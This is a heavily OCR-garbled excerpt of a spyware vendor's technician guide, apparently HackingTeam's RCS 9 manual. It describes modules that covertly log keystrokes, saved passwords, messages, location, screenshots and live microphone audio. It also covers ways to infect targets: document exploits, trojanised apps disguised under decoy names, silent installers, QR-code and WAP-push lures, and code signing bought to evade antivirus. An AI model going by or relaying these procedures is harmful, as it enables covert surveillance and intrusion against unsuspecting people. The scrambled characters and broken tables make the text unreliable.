RC5 9 - Infection module Fieid' Description Include Filters Exclude filters Mask Log path and access mode Capture ?le content MiniMax size Newer than List of ?le extensions to be recorded. Optionally specify the process to log the file when it is run or opened by that process. List of file extensions that will not be recorded. Optionally specify the process to ignore the file when it is run or opened by that process. String used to filter the process and file to log or ignore. Syntax Process Filter Example of features used to log "skype.exe "word.exe *John*.doc" Example of features used to ignore "skype.exe *.dat" Records the file path and access type read, write) If enabled, the ?le is copied and downloaded at the first access. Minimum and maximum size admitted for the ?le to be downloaded. Minimum ?le creation date to be downloaded. ?lnfection module of IMPORTANT: the module was deprecated as of RES 8.4. Keylog module Purpose The Keylog module records all keystrokes on the target device. 6 NOTE: it supports all Unicode characters via IM E. Operating systems Desktop: Windows, OS Mobile: Technician's Guide yer.1.5 SE P-2013 RC8 9 20136:] - pag. 130

RC5 9 - Signi?cant data Significant data None (-3 . . ULIvemIc module Purpose The Livemic module lets vou listen to a conversation in progress in real time. this module comes "us is" end its use corn be dongerous. Eoch device works i differently. We recommend you run thorough tests before using it in the J\?rield. Operating systems Mobile: Winlviobile Significant data Data is described below: Field Description Number Number of the phone used for listening. It must include the international country code, WARNING: do not hide the caller ID and disable the microphone when a listening to the conversation. 7 ?Messages module Purpose The Messages module records all messages received and sent by the target. This module captures: e-m ail 1: SMS (Mobile only) i MS (Mobile only) Technician's Guide ver.1.5 SE P-2013 RC8 9 20136:] - pag. 131

RC5 9 - Operating systems Operating systems Desktop: Windows Mobile: Operating systems e-maii MMS SMS {text message) Android - BlacltBerr'yr x: - 3?5 - x: WinMobile x: x: 15 IMPORTANT for Android, onlyr g.mail e-mail is captured and root privileges are required. See "What you should know about Android" on page 139 . Significant data Data is described below: Fieid Description Enabled Enables recording. From Records messages starting from the indicated date. To Records messages until the indicated date. Max size Maximum size of the message to be recorded. Mic module Purpose The Mic module records the surroundings audio using the device?s microphone. Platforms Desktop: Windows, OS Mobile: Android (disabled during calls), BlackBerry (disabled during calls), Symbian (disabled during calls), WinMobile, Windows Phone (disabled during calls) Technician's Guide uer.1.5 SE P-2013 RC8 9 2013 - pag. 132

RC5 9 - Signi?cant data IMPORTANT: do not turn on the microphone to record data calls li.e.: Skype, Viber} without having fullyr tested the phone model with the same operating system version. You mayr disable the client's audio, making the relevant application unusable.. NOTE: for Windows Phone, recording start and and may be accompanied by an audio signal on some device models. Significant data Data is described below: Fieid Description silence Maximum number of seconds of silence admitted in the recording. between After the set period, the agent stops recording and restarts when sound is received voices again. i . WARNING: if the value is too low, recording will exclude all silences and uh the conversation will flow without pauses. If the value is too high, the recording will include all silences and the conversation will be very long. 'v'oice recognition Autosen se 0 NOTE: not supported by Blackberry, Android and Symbian, Windows Phone. Value to identify human voice and exclude any background noise from the recording. WARNING: 0.2-0.28 is the suggested interval to identify human voice. Higher values better adapt to female voices but may result in the recording of background noise. If enabled, the agent attempts to change audio mixer settings (microphone onioff, line selection and volume) to optimize audio recording quality, avoiding low vol- um as or interruptions in the recording. $9 't Mouse module Purpose The Mouse module captures the image of a small area of the screen around the mouse pointer, upon each click. It helps to defeat virtual keyboards used to avoid keystroke recording. See "Keviog moduie" on page 130 . Technician's Guide ver.1.5 SE P-2013 RC8 9 2013 - pag. 133

RC5 9 - Operating systems Operating systems Desktop: Windows, OS it: Significant data Data is described below: Fieid Description Width captured image dimensions Height @Password module Purpose The Password module logs all passwords saved in the user?s accounts. Passwords saved in browser, Instant Messenger and web-mail clients are collected. Operating systems Desktop: Windows Mobile: Android Significant data None 9 Position mod ule Purpose The Position module records the device position using the GPS system, GSM cell or WiFi information. Operating systems Desktop: (WiFi only) Windows, US it Mobile: Android, BlackBerry, Symbian, WinMobile, Windows Phone Technician's Guide yer.1.5 SE P-2013 RC8 9 20139:] -pag. 134

RC5 9 - Signi?cant mobile data Significant mobile data Data is described below: Fieid Description GPS Finds the position from GPS information. Cell Finds the position from GSM cell or CDMA information. Wifi Finds the position from WiFi station BSSID. 0 NOTE: for Windows Phone, the system internally sets the most efficient way to find the device position at a given time, regardless of set parameters. QScreenshot module Purpose The Screenshot module captures the target device's screen image. IMPORTANT: for Android, root privileges are required to capture screenshots. See "What you should know about Android" on page 139 . Operating systems Desktop: Windows, OS Mobile: Android, BlackBerry, Symbian, WinMobile Significant data Data is described below: Fieid Description Quality, Captured image final quality. Low: worst image quality, maximum compression High: best image quality, less compression Tip: leave the default value. foreground window (Desktop only) Captures a snapshot of the foreground window. Technician's Guide ver.1.5 SE P-2013 RC8 9 2013 - pag. 135

RC5 9 - Url module Url module Purpose The Url module records the name of the websites visited by the target's browser. Operating systems Desktop: Windows, OS Mobile: BlackBerry, Symbian, WinMobile. IMPORTANT: when a BlackBerryr is restarted, in order for this module to be started, the telephone must be in for several minutes lbacklight off}. Significant data None Technician's Guide uer.1.5 SE P-2013 RC8 9 20136:] - pag. 136

12 Appendix: installation vectors resentatio Introduction An agent is a complex group of events, actions, modules and installation vectors. Single installation vectors are listed below with a detailed description of advanced configuration settings. Content This section includes the following topics: List ofinstallation vectors ..133 What you should knowaboutAndroid Obtaining a Code Signing certificate 139 Exploit vectorldesktop] .140 Melted Application vector Network Injection vector Offline Installation vector 142 Silent Installervector U3 Installation vector Exploit vectorlmohile] ..144 Installation Packagevector Local Installation vector QR CodefWeh Link vector ..149 WAP Push Messagevector Installation Package preparation for Symbian 152 Installation Package preparation for Windows Phone _.154 Technician Guide ver,1.5 SE - Riff} - 2'2'1'5 HT - pa g. 137?

RC3 9 - List of installation vectors List of installation vectors Operating systems supported by agents Operating systems supported by the various desktop and mobile devices are listed below: Device Operating System Desktop 0 Windows 0 05 Mobile 0 Android a. BlackBerry 0 Windows Mobile 0 bian IDS Vector list: installation Device Description Vector Applet Desktop Deprecated as of RC5 version 8.4. Web Exploit Desktop, Adds the agent to any document (documentfonnat may depend on the Mobile available exploits). Installation Mobile Creates an auto-installerfiie with the agent. Package Local lnstal- Mobile installs the agent on the target device either through USB or lation memory card. Melted Desktop Adds the agent to any application file. Application Network Desktop Link to the injection rule creation page. See "Managing the Network Injection injector" on page Offline Desktop Creates an file to generate a boot to be used on com- Installation puter that is off or hibernating QR Mobile Generates a QR code for sites or printouts that, if photographed by the cadeyweb target, will install the agent. Link Technician's Guide ver.1.5 SE P-2013 RC8 9 2013 - pag. 138

RC3 9 - Whatyou should know aboutAndroid Installation Device Description Vector Silent Desktop Creates an empty executable file that, when run on the target device, Installer installs the agent. U3 Instal- Desktop Creates a package to be installed via a U3 key. The U3 key that auto- Iation maticaiiy installs the agent on the target device when inserted. 1ll?llap Push Mobile Sends a WAP message that will install the agent if accepted by the tar- Message get. What you should know about Android Root privileges The Android operating system requires root privileges to run some operations on its devices. An Android device agent requires root privileges to: . capture chat, see "Chat module? on page 126 capture e-m ail, see "Messages module" on page 131 1- capture screenshots, see "Screenshot module? on page 135 . keep updated, see "Agent page" on page 41 "Target page" on page 28 Obtaining root privileges Root privileges can be automatically obtained without any interaction on the device. However, automatic acquisition is not always guaranteed. If automatic acquisition fails and Required Administrative Privilege was selected during agent compilation, the agent requests the user manually obtains privileges from the device if permitted by the operating system.$ee "Melted Application vector" on page 141 Checking for root privileges To check for root privileges on the target device, enable the Device module. Root status is indicated in Device type evidence; if root privileges were obtained, rootzyes appears. Obtaining a Code Signing certificate Introduction In order to use code signing functions available during vector compiling, a Code Signing certificate issued by a recognized Certification Authority must be obtained. Most Certification Authorities offer Code Signing certificates, including: Technician's Guide ver.1.5 SE P-2013 RC5 9 2013 - pag. 139

RC5 9 - Installing the Code Signing certi?cate . Verisign Thawte 1- GoDaddy Installing the Code Signing certificate On the Backend system, from the folder enter the following command: 3* ros?db?oonfig ??sign?cert Certificated-?ile- ??sign?pass Result: the certificate is installed in the system and the code signing function can now be used. Exploit vector (desktop) Purpose Compiling creates an installer which, when opened on the target device, exploits the vulnerability of a specific program. Different behaviors may be experienced, depending on the specific Exploit the running program is aborted). Installation The installer is created and the packet of utility files is automatically sayedC:\RCS\CollectorXpublic in the folder. These ?les may be used in many types of attacks yia link from a website). Deleting no longer used files Packets saved in the folder C:\RCS\Collector\public can be deleted using the File Manager function, see "Frontend management". Operating systems 05 X, Windows Parameters Nome Description File type Type of file to be infected .PDF). Choose an Full application name used by the target to open the file Adobe Acrobat Exploit Reader 10). URL URL pointing to the desired agent installation package. Document URL: connection to an Anonymizer where the installer was saved. Document: to select the file to be infected. Technician's Guide 1tier.1.5 SE P-2013 RC5 9 2013 - pag. 140

RC5 9 - Melted Applica?on vector Melted Application vector Purpose Compiling modi?es an existent executable by inserting the agent into it. Agent components are to prevent reverse engineering. Operating systems Android, OS X, Windows Parameters Nome Description Application to be Executable ?le to which the agent is added. used as dropper The file type differs based on the operating system: Android: third party APK application. IM PORTANT: test the final application. In fact, some applications run additional runtime security controls. 1. US I: compressed MacOs file .app. The application (a folder} must be compressed using the zip command from the Terminal.app con- sole. IM PORTANT: do not use the Compress menu item from the Finder application. 1. Windows: any EXE file. Require (Android only) If automatic acquisition fails, this option enables the user administrative request to manually obtain root privileges from the device. privileges I WARNING: the request is displayed on the target device. Network Injection vector Purpose The page opens the Network Injector function in the System section. Technician's Guide ver.1.5 SE P-2013 RC5 9 2013 - pag. 141

RICE- C?l - Operating systems Operating systems Parameters Offline Installation vector Purpose Compiling creates an auto-installer ISO file to be written on a CD or USB thumbdrive {Windows only}. Insert the CD or USB key, then turn on the target computer. Boot from the inserted media and wait for a menu to appear. Infection can be done selectively by choosing from a list of all the available users on the system. Operating systems Multiplatform. Parameters Nome Description Bootable Creates a ISO auto?installer for CD or DVD. CDIDVD Bootable {Windows only} Creates an ISO auto?installer for USB key. USB drive Dump Automatically extracts documents belonging to a certain user. Documents can be Mask saved on a USB peripheral to later be imported in the RC5 data base. Three document capture options are available: - Documents: MS Office, PDF and text file documents . Images: photos and images . Custom: select the file extensions to be capture, separated by the pipe char? acter ver.1.5 SE RC5 2013i? -pag. 142

RC5 9 - Silent Installer vector Silent Installer vector Purpose Compiling creates an executable that installs the agent in silent mode. No output is visible on the device. Operating systems 05 X, Windows Parameters Home Description Require Administrator privileges are required during agent installation. administrative Behavior differs according to operating system: Prw'leges 0 US X: if selected, the agent will request the root password, corrupting the authentication dialogue. If not selected, some modules will not work. 0 Windows: if selected, administrator privileges will be required to pro- ceed with agent installation. The option must be selected to target Win- dows ?v?ista devices, when the user is a member of the Administrator group. In all other cases, leave the option blank. Include 64bit (Windows only) The executable supports 64bit machines (size will increase by support (1130 Include audio codec (20D xiB} Use the cer- ti?cate to sign the dropper 100 ms). (Windows only) The executable includes the audio codec (size will increase by 200 Sign the executable using the digital certificate. The digital signature can significantly increase the level of invisibility to anti-viruses. NOTE: even if this option is not selected, the agent will download the audio codec required for the type of evidence to be acquired at ?rst PORTANT: follow the procedure to receive a certificate to use this function. See "Obtaining a Code Signing certificate" on page 139 . Service call: for further information on how to obtain a digital certificate, contact HackingTeam support service. 0 NOTE: 1 is 1024 byte. Technician's Guide ver.1.5 SE P-2013 RC8 9 2013 - pag. 143

RC3 9 - U3 Installation vector U3 Installation vector Purpose Compiling creates an ISO auto-installer to be written on a U3 kev (SanDisk) using the U3 customizer program (the software can be downloaded from Internet). When the key is inserted in the device, a menu opens for agent installation (no USB disk is automatically detected). Operating systems Windows Parameters None. Exploit vector (mobile) Purpose Compiling creates an installer that, executed on the target device, results in the device being infected. Different behaviors may be experienced, depending on the speci?c Exploit the running program is aborted). Installation The installer must be copied to the device and install.sh run from the copied folder. IMPORTANT: the device must be unlocked. The packet of utility files is autom aticallv copied to the folder These ?les may be used in many types of attacks via link from a website). Deleting no longer used files Packets saved in the folder C:\RCS\Collector\public can be deleted using the File Manager function, see "Frontend management?. Example of installer copy command on the device mymac>scp ?r mymac>ssh rootEmyiphone.local.net myiphone>cd Technician's Guide ver.1.5 SE P-2013 RC5 9 2013 - pag. 144

RICE- - Operating svstems myiphonenah inatall.ah Operating systems Parameters Name Description File type Type of file to be infected Choose an Full application name used bv the target to open the file Adobe Acrobat Exploit Reader 10}. URL Settings that identifv the file to be infected. Document URL: connection to an Anonvmizer where the installer was saved. Document: select the file to be infected. Installation Package vector Purpose Compiling creates an executable that installs the agent in silent mode. The executable can be loaded on the device with am; of these methods: . download from URL, . link via . directly from computer via USB ca ble, . {Windows Mobile onlv} direct copv to SD card, . {Windows Phone onlv} attachment via email. Notes for Android operating systems {vector preparation) Compiling generates two APK vectors {Android Application Package File}: . ApplicationNomevZapk: vector for Android . vector for Android 3.x and Arr Notes for Android operating systems {installation} The installation procedure is provided below: ver.1.5 SE RES 20131:] HT.?3.r.l. -pag. 145

RC5 9 - Notes for Windows Phone operating systems [vector preparation] Step Action 1 Enable the Unknown origins option in the device settings (tvpicallv under Settings, Applications). The option can be disabled after installation. 6 NOTE: if this option is not enabled, a request to authorize an application not in the Android Market appears during installation. 2 Device root privileges must be obtained if the vector includes Screenshot, Chat and Messages modules. See "What you shouid know about Android" on page 139 3 Run the appropriate APK vector on the selected device. 4 During APK vector installation, accept the permissions requested bv the agent. For Android 3.x and 4.x, click Open to start the vector, otherwise the vector will not be installed. IMPORTANT: the default APK vector for Android 3.: and 4.: appears as a normal application called Devicelnfo, that displays device information. 5 A request to obtain root privileges could appear when the vector is running if the Require Administrative Privilege option was enabled. Notes for Windows Phone operating systems (vector preparation) Compiling a factorv with the Installation Package vector for Windows Phone operating system creates .zip Fae toryNaine_wi nphone_silent. zip in folder RC5 Download that contains two files: . Applioa ti oaName . sap: packet with applications to be installed on the target device a Applies ti oaNaine. aetx: companv certi?cate to install the application IMPORTANT: in order for compiling to be successfullyr completed, follow the procedure to load the necessarvr files in RC5. See "instaiiation Package preparation for Windows Phone" on page 154 Notes for Windows Phone operating systems (installation) The MvPhoneInfo application, used to install the agent, is included in the packet with .2513) applications. Installation does not require phone unlock. .xap and .aetx files can be sent to the target device: I. as attachments in an email,- a as a link in a web page. For installation via web, the Web service must correctlv support the MIME tvpes for the.xap and .aetx files; the following instructions must be found in the mime. types files: Technician's Guide ver.1.5 SE P-2013 RC5 9 2013 - pag. 146

RCS 9 - Notes for Windows Mobile operating systems applicationKX?silveflight?app xap application/X?aetx aetx Run the following procedure for both modes: Step Action 1 Open file Applica ti onName . aetx. IMPORTANT: this is the certificate that must always be opened first. 2 Answer the displayed questions by clicking Add. 3 Open file Appli ca ti onName . zap. 4 Answer the displayed questions by clicking Install: the MyPhonelnfo application will be installed on the phone. From the application list, open the MyPhonelnfo application at least once. U'l Close MyPhonelnfo: the agent is ready. IMPORTANT: if you exit the application without closing it, the application, and thus the agent, are suspended. The agent only starts when the application is closed or the phone is turned back on. in The agent communications with the RC5 server if and as long as the MyPhonelnfo application is installed on the device and the device is on. If a mobile data connection is not ayailabl e, the agent can only communicate with the RC5 server when the user uses the phone or the phone is connected to a computer or battery charger. NOTE: when the device is turned on, it takes 30 minutes for the agent to restore communications with the RC5 server. The 30 minutes are guaranteed if mobile data and Wi-Fi connections are running on the device. Otherwise, it could take longer. Notes for Windows Mobile operating systems An existing CAB installer can be specified to which the agent will be added. If a CAB is not specified, the system will use a default, dummy CAB. Notes for BlackBerry operating systems To allow the agent to be downloaded on a BlackBerry, extract the created zip file on a web server the device can access. NOTE: the web server must correctly support the IM types for .jad and .cod files, . sun. j3me . app?descriptor and rim. cod. respectively. The Collector public folder automatically runs this function. Once the installer is run on the device, accept the permissions requested by the agent. Technician's Guide 1yer.1.5 SE P-2013 RC5 9 2013 - pag. 147

RC3 9 - Notes for svmbian operating systems Notes for Symbian operating systems the procedure to receive a certificate for svmbian. See "instaiiation Package preparation for Symbian" on page 152 . Operating systems Android, BlackBerrv, svmbian, WinMobile, Windows Phone Android, Win Mobile, Windows Phone parameters Name Description Application name Application name (visible to target] Require (Android onle If automatic acquisition fails, this option enables the user Administrative request to manuallv obtain root privileges from the device. Privilege I. WARNING: the request is displayed on the target device. BlackBerrv settings Name Description Application name Installer name (visible to target] Name (BlackBerrv onle Application data used to "hide" the agent. Description Vendor Version Symbian settings Name Description Application name Application name (visible to target] Certificate bound to phone IMEI Device certi?cate. 560 Edition Operating system version. Technician's Guide ver.1.5 SE P-2013 RC5 9 2013 - pag. 148

RC3 9 - Local Installation vector Home Description Symbian con?guration UID 1-6: list of UID associated with the certificate . Key: key file Local Installation vector Purpose Compiling installs the agent on the target's BlackBerry device or creates a folder on the SD card to be inserted in the device. 0 IMPORTANT: to successfully complete installation on a BlackBerry device, the Blackberry Desktop Software application must be installed on a Windows computer. The Console will create a .zip ?le with all the files required to infect a connected BlackBerry. Copy the zip file to the Windows computer [if necessary} then unzip the .zip file. Connect the BlackBerry to the PC using an USB cable, then run the install.bat file. If the BlackBerry is PIN protected, provide the PIN when asked. Operating systems BI ackBerry, WinM obile Parameters None. QR Code/Web Link vector Purpose Compiling creates a QR Code to be added to any website or printout. As soon as the target captures the QR code, the agent is installed in the device. Operations As soon as the target connects to the Anonymizer and requests the installer, the Collector downloads the correct installer for the target device's operating system in the . Technician's Guide ver.1.5 SE P-2013 RC8 9 20136:] - pag. 149

RC5 9 - Deleting no longer used ?les Deleting no longer used files Packets saved in the folder C:\RCS\CoIIector\public can be deleted using the File Manager function, see "Frontend management". Operating systems Android, BlackBerrv, Symbian, WinMobile NOTE: if the target's operating system is unknown, use the multiplatform version. Parameters Nome Description Application name URL Requhe administrative privileges Name Description Vendor Version Certificate bound to phone llv?lEl 550 Edition Installer name (visible to target) Connection to an Anonvmizer where the installer was saved. (Android only) If automatic acquisition fails, this option enables the user request to manuallv obtain root privileges from the device. I WARNING: the request is displayed on the target device. (BlackBerrv onlv) Application data used to "hide" the agent. (svmbian onlv) Device certificate. (svmbian onlv) Operating system version. WAP Push Message vector Purpose Creates a message that invites the target to visit a link. Technician's Guide ver.1.5 SE P-2013 RC5 9 2013 - pag. 150

RCS 9 - Operations Operations Sends a message containing either text or a link to the agent installer. If the message is accepted on the target device, the agent will be installed. the procedure to receive a certificate for Symbian. See "installation Package preparation for Symbian" on next page . Installation Compiling creates an installer and automatically saves the utility file packet in the folderC:ERCSECoIIectorEpublic . Deleting no longer used files Packets saved in the folder C:ERCS\CollectorEpublic can be deleted using the File Manager function, see "Frontend management". Operating systems Android, BlackBerrv, svmbian, Winl'vlobile 0 NOTE: if the target's operating system is unknown, use the multiplatform version. This creates installers for all the supported platforms and saves them in the Collector's Public folder. As soon as the target connects to the Anonvmizer and requests the installer, the Collector downloads the correct installer for the target device's operating svstem. Parameters Name Description Application Installer name (visible to target) name Phone Target's phone number, including international area code. Number URL Connection to an Anonvmizer where the installer was saved. If the package was saved on another website, specify the URL. Technician's Guide ver.1.5 SE P-2013 RC3 9 2013 - pag. 151

RCS 9 - Installation Package preparation for Symbian Home Description service Type Type of service requested: 0 Loading: the target phone is automatically redirected to the resource indicated in the URL. Depending on the phone security settings, the application can be automatically installed or a message can be dis- played to the user, asking how to proceed. Indication: a message will be displayed asking the user how to pro- ceed. 0 SMS: sends the link preceded by the speci?ed text Require (Android only] If automatic acquisition fails, this option enables the user administrative request to manually obtain root privileges from the device. pr'l?l'leges WARNING: the request is displayed on the target device. Text (for Indication and SMS only] Test for the target user. Name (BlackBerry only) Application data used to "hide" the agent. Description Vendor Version Certificate (Symbian only] Device certificate. bound to phone IMEI 550 Edition (Symbian only] Dperating system version. Installation Package preparation for Symbian Introduction Starting from bian OS version 9.1, a Symbian Development Certificate is required to install and run an agent on a bian device. Currently, each issued certificate supports up to 1000 IM El and up to 1? capabilities. Recommended sequence Complete the following steps to request a certificate: Step Action 1 Obtain the editor ID 2 Creating Certificate Public and Private keys Technician's Guide ver.1.5 SE P-2013 RC8 9 2013 - pag. 152

RC5 9 - Dbtain die Editor D[you] Step Action 3 Creating the Development Certi?cate Obtain the Editor ID {you} Follow the procedure below: Step Action 1 Purchase the certi?cate in TrustCenter NOTE: the certificate must be a "Developer Certificate" and not a "Test House Certi?cate?. 2 After purchasing the certificate (valid for one year), the following documentation must be provided by the applicant: . A copy of the applicant company's official registration (from the authorities) or equivalent. . A written application signed by an authorized company official. 1. A signed copy of the applicant's ID or passport (with photo and signature). Creating Certificate Public and Private keys Follow the procedure below: Step Action 1 Within several days of application (usually four), you will receive a confirmation e- mail from TrustCenter with a link to the certi?cate and editor's ID. 2 Save the certi?cate on the computer. 3 Download and install the TC- Converter tool from: 4 Copy ?r?our DeveloperCert.p 12 to the TC-Converter folder. 5 Run YourDeveloperCert. p12 keytc. Ge the Tc.key and Tc certi?cate are created. Creating the Development Certificate After creating the various keys, the certificate must be created with the appropriate Il'leI numbers. This procedure can be run several times as new IM El numbers need to be added. NOTE: for further information see guide: Symbian Signed. Follow the procedure below: Technician's Guide ver.1.5 SEP-2D13 RC3 9 2013 - pag. 153

RCS 9 - Installation Package preparation for Windows Phone Step Action 1 Creating an account at biansigned.com 2 0 Click My Dashboard and select the My Profile tab. . Make sure the Countrv matches the data in the editor ID. 0 Click Verifv Account 3 0 Download ?le .svs . Sign the .svs file with the .cer and key ?les for the same editor ID using this command:signsis sis.sia aigned.sis tc.cer to.key it Upload the signed file .sis 4 Login to the created account 5 0 Click My Dashboard and select the Manage Ule tab. . Request six UID (within the protected range): and leave the other ?elds Hank 0 Once obtained the UID, select the Development Certi?cate tab . Enter the device IMEI numbers (to obtain the number, enter or read the code in the batterv com partment] 0 Click Download Certi?cate. IMPORTANT: do not upload the RC5 .sis agent on the signed symbian site. For each new target, enter the new IMEI number and download the new Development Certificate. Do not download the .sis file again. . Use the Development Certificate to sign RCS agents for bian. Installation Package preparation for Windows Phone Introduction For Windows Phone devices, the agent is installed on the target device through a Windows Phone application. The following ?les must be on the RC5 server to successfullv complete agent installation: . a .pfx file to sign the Windows Phone .xap installation packet 0 an .aetx ?le as a Windows Phone application certificate Recommended sequence Complete the following steps to generate the .pfx and .aetx files and load them on the RC5 server: Technician's Guide ver.1.5 SE P-2013 RC8 9 2013 - pag. 154

RC5 9 - How to read these instructions Ste- Action 1 Obtain a svmantec ID code to be used to purchase the certi?cate required to distribute a Windows Phone application. Obtain the svmantec certificate required to distribute Windows Phone applications. Install the antec certificate required to distribute Windows Phone applications. Generate the .pfx and .aetx files Load the .pfx and .aetx files on the RC5 server How to read these instructions NOTE: links to web pages in the procedures were working when the manual was written. If the link does not work, find the right web page.. In the event of discrepancies between that indicated in the manual and the instructions received directlv from the concerned organizations, follow the organizations' instructions. Obtaining a svmantec ID code Proceed as follows to obtain it: Step Action 1 Regi?ter a MichEDf-t account in 1. 2 Register an account in Windows Phone Dev Center logging in with your Microsoft account in Technician's Guide ver.1.5 SE P-2013 RC3 9 2013 - pag. 155

Step Action RCS 9 - Obtaining a Symantec certi?cate 3 Click Join Now: the Windows Phone Dev Center account registration page appears. Select Company as Account Type. Click Next. In the Account Info section, enter your data and contacts. In the Publisher Info section, enter the name to be displayed as the appli- cation distributor during installation as the Publisher Name. WARNING: the user who installs the .xap packet and .aetx certificate on his phone sees this name. In the Approver Info section, enter the data and contact information for the company manager who can approve the registration request. Complete registration following the on-screen instructions. IMPORTANT: prove a correct email address and phone number since they will be used to validate registration and provide the Publisher IO. After registering, you will receive an email from Symantec, the Microsoft partner that validates companies registered with Windows Phone Dev Center, to validate registration. Additional communications may also occur by phone. IMPORTANT: have the Approver respond to the Symantec email. 5 After validation, you will receive an email with account data: Publisher ID Publisher Name NOTE: to learn more, visit Obtaining a Symantec certificate The Enterprise Mobile Code Signing Certificate is required to distribute Windows Phone applications. Proceed as follows to obtain it: Step Action 1 Purchase 3 Enterprise Mobile Code Signing Certificate from Symantec at Technician's Guide ver.1.5 SE P-2013 RCS 9 2013 - pag. 156

RC5 9 - Installing the svmantec certi?cate Step Action 2 3 1. Enter the Publisher ID vou received and the email indicated in the Account Info section during Windows Phone Dev Center registration. 1- Complete the purchase following the on-screen instructions. When finished, vou will receive a couple of emails from svmantec indicating: . order con?rmation 1- the list of enabled functions according to the order It the certificate and instructions on how to import it on your computer NOTE: to learn more, visit US Installing the Symantec certificate To complete Enterprise Mobile Code Signing Certificate installation, first install: 0 Enterprise Mobile Root; Enterprise Mobile CA certi?cate. IMPORTANT: always use the same browser to download certificates. The Firefox browser is referred to in the described procedure. Follow the procedure below: Step Action 1 2 Open Firefox. Copy: and paste the URL received in the email in the address bar to install Microsoft Enterprise Mobile Root Certificate. In the Download certi?cate dialog window, select all three check boxes and click OK. Copv and paste the URL received in the email in the address bar to install Microsoft Enterprise CA Root Certificate. In the Download certi?cate dialog window, select all three check boxes and click OK. NOTE: to check whether certificates were installed, select the certi?cate in the Firefox menu, Options, and select Advanced. Next select the Certificates tab and click on Show Certi?cates: the names of the installed certi?cates appear in the certificate list in the Authorities. Install Enterprise Mobile Code Signing Certificate from the link in the email vou received and click Continue. Technician's Guide ver.1.5 SE P-2013 RC3 9 2013 - pag. 1571rr

RC3 9 - Generate d1e.pfx and .aetx ?les Generate the .pfx and .aetx ?les The .pfx and .aetx files required to sign and distribute Windows Phone applications can be generated with Enterprise Mobile Code Signing Certificate. IMPORTANT: the procedure requires Windows Phone Software Developer Kit 8.0, available at to be installed on the computer. The AET Generator tool included in this kit lets vou create the .aetx file. IMPORTANT: use the same browser used to install the certificates to run the procedure. The Firefox browser is referred to in the described procedure. Follow the procedure below: Step Action 1 Open Firefox. 2 In the Firefox menu, select Options. Next, select Advanced, and then the Certificates tab. 3 Click Show. certificates. 4 In the Personal certificates tab, select the Publisher name certificate and click Export at Save the file with the .p12 extension 1. Enter the certi?cate export password: "password" IMPORTANT: enter this and not other passwords. 5 Rename the file with the .pfx extension 5 From the Windows command prom pt, open the folder where the .pfx file is saved and run the following command: "%ProgramFiles File?ame.pfx password where FiieNome is the name of the .pfx file. Result: three files are generated in the folder where the .pfx file is saved: 0 AET.aetx AET.aet . NOTE: to learn more, visit Technician's Guide 1tier.1.5 SE P-2013 RC5 9 2013 - pag. 158

RC3 C?i - Load the .pfx and .aeb-z ?les on the RC3 database server Load the .pfx and .aetx files on the RC5 database server Fol low the procedure below: Step Action 1 Copv the files to the RC5 data base server 2 From the Windows command prompt, run the following command to use the .pfx ?le to sign Windows F'hone applications: roa?db?oonfig ??a'gn?pf3?Vinphone EilefachlE?leNa?e.pr where FifePoth is the .pfx file path on the RC5 server 3 From the Windows command prompt, run the following command to use the .aetx file as a Windows Phone application certificate: roa?db?oonfig ??a'gn?aetH?winphone tilefachlE?le?a?e.aetx where FifePoth is the .aetx file path on the RC5 server ver.1.5 EFF-2013 RES. 2013f; -pag. 159

]Hacki?gTeam[ HT 5.r.l. via della Moscova, 13 RES 9 Technician's Guide 20121 Milano (M Technician's Guide 1.5 SE P-2013 Italy COPYRIGHT 2013 tel.: 39 02 29 060 603 info@hackingteam.com fax:+ 39 02 63 113 946